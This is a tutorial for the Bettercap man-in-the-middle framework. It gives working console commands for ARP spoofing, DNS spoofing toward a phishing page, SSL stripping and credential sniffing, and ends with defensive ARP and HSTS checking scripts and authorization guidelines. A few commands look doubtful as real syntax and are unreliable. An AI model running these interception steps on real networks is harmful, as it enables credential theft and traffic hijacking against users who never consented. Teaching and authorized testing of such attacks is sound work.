Introduction
Bettercap is the modern, modular framework for man-in-the-middle (MITM) attacks and network interception. It replaces outdated tools like ettercap with a more powerful, flexible architecture. Whether you’re conducting authorized network penetration testing or learning about network security, Bettercap enables credential capture, traffic interception, and protocol manipulation on local networks.
What Is Bettercap?
Bettercap is a modular, portable, and easily extensible MITM framework and network attack tool. It provides capabilities for ARP spoofing, DNS spoofing, SSL stripping, credential capture, and session hijacking—all from a unified command-line interface or interactive prompt.
Key Features
- ARP spoofing for network MITM positioning
- DNS spoofing for domain redirection
- HTTP/HTTPS interception and modification
- Credential capture from HTTP, FTP, IMAP, and other protocols
- Session hijacking and cookie theft
- Network reconnaissance and mapping
- Custom module development for advanced attacks
- REST API for integration with other tools
Prerequisites and Installation
System Requirements
- Linux system (Debian/Ubuntu, Fedora, Arch recommended)
- Root/sudo privileges
- Wireless adapter (for wireless attacks)
- Go 1.11+ for compiling from source
Install on Ubuntu/Debian
sudo apt update
sudo apt install bettercap libpcap-dev libnetfilter-queue-dev
Install on Fedora
sudo dnf install bettercap libpcap-devel libnetfilter_queue-devel
Verify Installation
bettercap -h
Network Basics: ARP Spoofing Fundamentals
Before running attacks, understand the mechanism. ARP (Address Resolution Protocol) maps IP addresses to MAC addresses. Spoofing ARP packets allows Bettercap to intercept traffic meant for other hosts.
How ARP Spoofing Works
Victim: 192.168.1.100
Gateway: 192.168.1.1
Attacker: 192.168.1.50 (MAC: AA:BB:CC:DD:EE:FF)
Attack:
Attacker sends ARP: "I am 192.168.1.1" (with attacker's MAC)
Victim believes attacker is the gateway
All traffic flows through attacker's machine
Starting Bettercap
Interactive Mode
sudo bettercap
This launches the interactive prompt where you can issue commands.
Command-Line Mode
Run specific attacks directly:
sudo bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.100; net.probe on"
Fundamental Commands and Modules
Reconnaissance
Show the current interface, the gateway and any hosts already known:
> net.show
Probe the network for hosts:
> net.probe on
Wait 30 seconds for discovery, then:
> net.show
This reveals all active hosts on your local network.
Enable Packet Capture
Before performing MITM attacks, make the sniffer print every captured packet (the sniffer itself is started later with net.sniff on):
> set net.sniff.verbose true
This shows captured traffic in real-time.
ARP Spoofing Attack Workflow
Step 1: Identify Targets
> net.probe on
> net.show
Note the IP and MAC address of your target and the gateway.
Step 2: Configure Targets
> set arp.spoof.targets 192.168.1.100
# The gateway is read from the routing table when the session starts; there is no arp.spoof.gateway setting
Step 3: Enable ARP Spoofing
> arp.spoof on
Your machine now intercepts traffic between the target and gateway.
Step 4: Monitor Captured Traffic
> net.sniff on
The console shows HTTP requests, DNS queries, and other unencrypted data passing through your machine.
Step 5: Stop the Attack
> arp.spoof off
This restores normal network function (critical for ethical operation).
Credential Capture with HTTP Sniffer
Enable HTTP Sniffer
Set the proxy options first, then start the module (options are read when it starts):
> set http.proxy.port 8080
> set http.proxy.sniffer true
> http.proxy on
The HTTP proxy module now logs credentials found in the HTTP requests it forwards.
Observe Captured Credentials
When targets browse HTTP sites, credentials appear in the Bettercap output:
[12:34:56] [HTTP.SNIFFER] POST to 192.168.1.100:80
Username: admin
Password: password123
DNS Spoofing Attacks
Step 1: Choose Domains
> set dns.spoof.domains example.com
> set dns.spoof.all false
Step 2: Enable DNS Spoofing
> dns.spoof on
This redirects requests for example.com to your machine.
Step 3: Set Up Fake Web Server
Create a simple HTTP server to serve phishing pages:
# In another terminal
python3 -m http.server 80
Place phishing HTML in the current directory.
SSL Stripping (HTTPS Downgrade)
> set http.proxy.sslstrip true
> set net.sniff.verbose true
Enable the SSL stripper module:
> caplets.show
> caplets.load hsts
This strips HSTS headers, allowing downgrade of HTTPS to HTTP in some scenarios.
Advanced Bettercap Techniques
Multiple Targets
Spoof multiple hosts simultaneously:
> set arp.spoof.targets 192.168.1.100,192.168.1.101,192.168.1.102
> arp.spoof on
Whitelist Protection
Prevent spoofing specific hosts:
> set arp.spoof.whitelist 192.168.1.1
Bandwidth Control
Limit bandwidth to prevent detection:
> set net.traffic.monitor.rate 0.01
Packet Injection
Modify and inject custom packets using custom modules (advanced):
> module.load /path/to/custom_module.go
Using Caplets for Automation
Caplets are Bettercap automation scripts. Load pre-built attack scenarios:
> caplets.show
> caplets.load beef
This loads a caplet that integrates with the BeEF framework.
Real-World Attack Scenario
Complete Credential Capture Workflow
sudo bettercap
# 1. Discover hosts
> net.probe on
> net.show
# 2. Configure targets
> set arp.spoof.targets 192.168.1.100
# gateway is detected from the routing table; no separate setting needed
# 3. Enable spoofing
> arp.spoof on
# 4. Enable HTTP interception (set options before starting the module)
> set http.proxy.sniffer true
> http.proxy on
# 5. Monitor
> net.sniff on
# 6. Wait for requests
# [Monitor output for credentials]
# 7. Stop attack
> arp.spoof off
> http.proxy off
Network Defense: Detecting and Preventing MITM
Detection Indicators
- ARP anomalies or duplicate MAC addresses
- Unexpected changes to default gateway MAC
- Network monitoring tools alerting on unusual traffic patterns
- Certificate warnings on HTTPS sites
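The first two indicators above (a changed gateway MAC and one MAC answering for several IPs) can be checked mechanically from the host's ARP table. The following script is an added example written for this page; it is not part of Bettercap. It parses snapshots in /proc/net/arp format, compares them with a trusted baseline and reports both indicators. The two snapshots and the gateway address are constructed sample data; read_proc_arp() reads the live table on a Linux host.

```python
import re
from collections import defaultdict

# Constructed snapshots in /proc/net/arp format (not captured from a real host).
# BASELINE is recorded while the network is known-good; AFTER is the same table
# after a host at 192.168.1.50 started answering ARP requests for the gateway.
BASELINE = """IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.100    0x1         0x2         66:77:88:99:aa:bb     *        eth0
"""
AFTER = """IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:ff     *        eth0
192.168.1.100    0x1         0x2         66:77:88:99:aa:bb     *        eth0
192.168.1.50     0x1         0x2         aa:bb:cc:dd:ee:ff     *        eth0
"""
GATEWAY = "192.168.1.1"  # constructed sample value

# ip, hw type (skipped), flags, mac, mask (skipped), device
_ROW = re.compile(
    r"^(\d{1,3}(?:\.\d{1,3}){3})\s+\S+\s+(0x[0-9a-fA-F]+)\s+([0-9a-fA-F:]{17})\s+\S+\s+(\S+)"
)


def parse_arp_table(text):
    """Map IP -> lowercase MAC for resolved entries; skip the header and incomplete rows."""
    table = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if not m:
            continue
        ip, flags, mac, _dev = m.groups()
        if int(flags, 16) & 0x2:  # ATF_COM: the entry has been resolved
            table[ip] = mac.lower()
    return table


def find_anomalies(baseline, current, gateway_ip, shared_ok=()):
    """Compare the current table with a trusted baseline and describe each indicator found.

    shared_ok lists MACs that legitimately own several IPs (a router with secondary
    addresses, for example) so they are not reported as duplicates.
    """
    alerts = []
    old_gw, new_gw = baseline.get(gateway_ip), current.get(gateway_ip)
    if old_gw and new_gw and old_gw != new_gw:
        alerts.append(f"gateway {gateway_ip} MAC changed from {old_gw} to {new_gw}")
    for ip, mac in current.items():
        if ip != gateway_ip and ip in baseline and baseline[ip] != mac:
            alerts.append(f"host {ip} MAC changed from {baseline[ip]} to {mac}")
    owners = defaultdict(list)
    for ip, mac in current.items():
        owners[mac].append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1 and mac not in shared_ok:
            alerts.append(f"MAC {mac} answers for several IPs: {', '.join(sorted(ips))}")
    return alerts


def read_proc_arp(path="/proc/net/arp"):
    """Read the live ARP table on a Linux host (not used by the constructed demo)."""
    with open(path) as fh:
        return parse_arp_table(fh.read())


if __name__ == "__main__":
    base = parse_arp_table(BASELINE)
    for alert in find_anomalies(base, parse_arp_table(AFTER), GATEWAY):
        print("ALERT:", alert)
```

Run it periodically (a cron job or a loop calling read_proc_arp()) against a baseline captured while the segment is known-good. A single MAC owning several IPs is also what a router with secondary addresses or a host with a virtual IP looks like, so keep those MACs in shared_ok rather than silencing the check. On the constructed data the script reports the gateway MAC change and the duplicate MAC and nothing else.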
Prevention Measures
- Use HTTPS everywhere (prevents SSL stripping)
- Enable static ARP entries on critical hosts
- Deploy ARP monitoring tools
- Segment networks to limit MITM impact
- Use VPN for sensitive traffic
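"Use HTTPS everywhere" only defeats SSL stripping when the browser already refuses plain HTTP for the site, which is what a strong Strict-Transport-Security policy provides. The checker below is an added example written for this page, not part of Bettercap or any library; it parses a Strict-Transport-Security header value and lists the gaps a stripping attack could still use. The header values are constructed samples, and the one-year threshold is the minimum the HSTS preload list requires (an assumption about current list policy).

```python
ONE_YEAR = 31536000  # seconds; minimum max-age accepted by the HSTS preload list (assumption)


def parse_hsts(value):
    """Parse 'max-age=N; includeSubDomains; preload' into a dict.

    Returns None for a missing or malformed header, because a browser ignores it
    in both cases (RFC 6797 makes max-age mandatory).
    """
    if value is None:
        return None
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        name = name.strip().lower()  # directive names are case-insensitive
        if name == "max-age":
            try:
                policy["max_age"] = int(arg.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    if policy["max_age"] is None:
        return None
    return policy


def hsts_findings(headers):
    """Return the weaknesses of a response's HSTS policy; an empty list means none found."""
    value = next((v for k, v in headers.items() if k.lower() == "strict-transport-security"), None)
    policy = parse_hsts(value)
    if policy is None:
        return ["no valid Strict-Transport-Security header: every visit can be downgraded to HTTP"]
    findings = []
    if policy["max_age"] == 0:
        findings.append("max-age=0 tells clients to forget the policy")
    elif policy["max_age"] < ONE_YEAR:
        findings.append(f"max-age {policy['max_age']} is below one year; protection lapses quickly")
    if not policy["include_subdomains"]:
        findings.append("missing includeSubDomains: subdomains can still be downgraded")
    if not policy["preload"]:
        findings.append("not preloaded: the first visit, before the header is cached, is unprotected")
    return findings


if __name__ == "__main__":
    # Constructed sample responses, strongest first.
    samples = [
        {"Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"},
        {"strict-transport-security": "max-age=300"},
        {"Content-Type": "text/html"},
    ]
    for headers in samples:
        print(headers, "->", hsts_findings(headers) or ["ok"])
```

The "not preloaded" finding is the one that matters most against the downgrade described earlier: without preloading, a client that has never seen the site has no cached policy, so its first request can be made over plain HTTP and rewritten. Pair the header with a preload submission, and check the header on every subdomain, not just the apex.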
Legal and Ethical Guidelines
Required Authorization
- Only perform MITM attacks on networks you own or have written permission to test
- Unauthorized network interception is illegal under wiretapping and computer fraud laws
- Document all authorization in writing
- Maintain clear scope of engagement
Responsible Practice
- Test on isolated lab networks first
- Use credentials and data only for authorized purposes
- Disable attacks immediately after testing
- Report findings professionally and confidentially
- Never access or steal personal data
Troubleshooting Common Issues
ARP Spoof Not Working
# Verify IP forwarding is enabled
sudo sysctl -w net.ipv4.ip_forward=1
# Check interface is correct
> net.show
# Verify you have root privileges
sudo bettercap
No Traffic Captured
- Verify targets are actively communicating
- Check that ARP spoofing is actually enabled
- Confirm you’re targeting the correct IP addresses
- Ensure network interface is on the same subnet
Connection Instability
- Reduce the number of simultaneous targets
- Check for conflicting network tools
- Verify gateway connectivity
- Monitor system resource usage
Conclusion
Bettercap transforms network-level attack capabilities into an accessible, modular framework. By mastering ARP spoofing, DNS manipulation, and credential capture, you’ll understand critical network vulnerabilities. However, these capabilities demand strict ethical discipline—use Bettercap only for authorized testing on networks where you have explicit written permission. Start with isolated lab environments, progress to authorized penetration tests, and always prioritize responsible disclosure and network safety.